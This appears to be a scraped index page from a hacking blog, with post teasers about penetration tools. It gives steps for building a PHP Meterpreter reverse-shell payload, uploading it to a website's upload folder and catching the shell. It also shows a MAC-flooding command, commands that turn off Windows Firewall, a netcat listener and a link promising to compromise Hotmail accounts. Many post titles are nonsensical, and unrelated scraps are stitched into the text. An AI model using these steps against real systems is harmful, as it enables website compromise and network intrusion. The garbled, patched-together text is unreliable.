inurl:upload

1.Using msfpayload in backtrack 5r1 root@bt:~# msfpayload php/meterpreter/reverse_tcp LHOST=Your-IP-Address LPORT=8080 R > connection.php 2. Connection.php is created in root. 3. Open msfconsole use exploit/multi/handler set PAYLOAD php/meterpreter/reverse_tcp set LHOST Your-IP-Address set LPORT 8080 exploit 4. Upload the file to a website then search for it eg dvwa/hackable/uploads [ ]    connection.php    21-Jan-2011 11:06     1.3K 5.… Continue reading inurl:upload

come over for … June 23, 2012 Meanwhile, back at the ranch.

Sites we like. Our daily bookmarks for your inspiration. Follow @Siteswelike. Follow. http://securityhorror.blogspot.se/2012/05/ask-and-you-shall-receive-part-1.html 1991 – Can’t Beat the Real Thing. MyExploitHQ

23 Nov 2011 – While You Were Out: Weekly World

 MyExploitHQ wanted to show our support to all the countries that have viewed this notebook so far!   United States United Kingdom India Germany Netherlands France Poland Brazil Canada Spain Italy Portugal Australia Singapore Sweden Algeria Mexico Egypt South Africa Indonesia Turkey Argentina Israel Nigeria Pakistan Ukraine United Arab Emirates Morocco Greece Chile Ireland Saudi… Continue reading 23 Nov 2011 – While You Were Out: Weekly World

a positive feeling of esteem

Please take a look at this video on YouTube https://msfbt.wordpress.com/ MyExploitHQ support

It appears you or your system administrator has been in a coma for over 5 years and you are still using IE7

ipcalc takes an IP address and netmask and calculates the resulting broadcast, network, Cisco wildcard mask, and host range. By giving a second netmask, you can design sub- and supernetworks. It is also intended to be a teaching tool and presents the results as easy-to-understand binary values. -n –nocolor  Don’t display ANSI color codes. -b… Continue reading It appears you or your system administrator has been in a coma for over 5 years and you are still using IE7

Jan 09 09:09:12.653 [Warning] You are running Tor as root. You don’t need to, and you probably shouldn’t.

Search for computers based on software, geography, operating system, IP address and more. For example, it can find servers running Apache 2.2.3 on Windows … http://www.shodanhq.com/search?q=Iis%2F4 http://www.shodanhq.com/exploits?q=iis%2F4 Microsoft IIS 4.0 .HTR Path Overflow This exploits a buffer overflow in the ISAPI ISM.DLL used to process HTR scripting in IIS 4.0. This module works against Windows… Continue reading Jan 09 09:09:12.653 [Warning] You are running Tor as root. You don’t need to, and you probably shouldn’t.

network – cisco mac flood

macof floods the local network with random MAC addresses (causing some switches to fail open in repeating mode, facilitating sniffing) root@bt:~# macof -i tap0 OPTIONS -i interface     Specify the interface to send on. -s src     Specify source IP address. -d dst     Specify destination IP address. -e tha     Specify target hardware address. -x sport     Specify TCP… Continue reading network – cisco mac flood

Request failed Sorry, we are unable to serve your request at this time due to unusual traffic from your network connection. Please visit our help page for further assistance.

Controlling Windows Firewall via the command line Enabling Windows Firewall Netsh firewall set opmode enable Disabling Windows Firewall Netsh firewall set opmode disable Bellow shows accessing Windows from backtrack using ncat more can be read on ncat http://www.myexploit.wordpress.com/control-netcat/ root@bt:~# nc -lvvp 80 listening on [any] 80 … IP-Address: inverse host lookup failed: Unknown server error… Continue reading Request failed Sorry, we are unable to serve your request at this time due to unusual traffic from your network connection. Please visit our help page for further assistance.

Please correct the marked field(s) below. The text you provided is too long (the maximum length is 7,000 characters, your text contains 26,081 characters).

17 Feb 2010 – “I’m sorry for the delay in replying, but…”. We’re back at last! Post by forumAdmin » Tue Dec 22, 2009 9:28 am. MyExploitHQ is real busy at the moment and as soon as we can we will update you all! Till then thanks for the support, https://myexploit.wordpress.com/information-gathering-metagoofil/

at Rocstar … Respect Sameh Sabry

Sameh Sabry Chad Jackson – Hear The Drummer (get Wicked) …. February 3, 2012 11:34 AM; 505whimsygirl said… Love your use of color. Tamper Data https://samehsabry.wordpress.com/2012/04/29/8-steps-to-compromise-any-hotmail-account/ by Susan Heathfield · in 1,015 Google+ circles · More by Susan Heathfield “Respect your fellow human being, treat them fairly, disagree with them honestly, enjoy their friendship, explore… Continue reading at Rocstar … Respect Sameh Sabry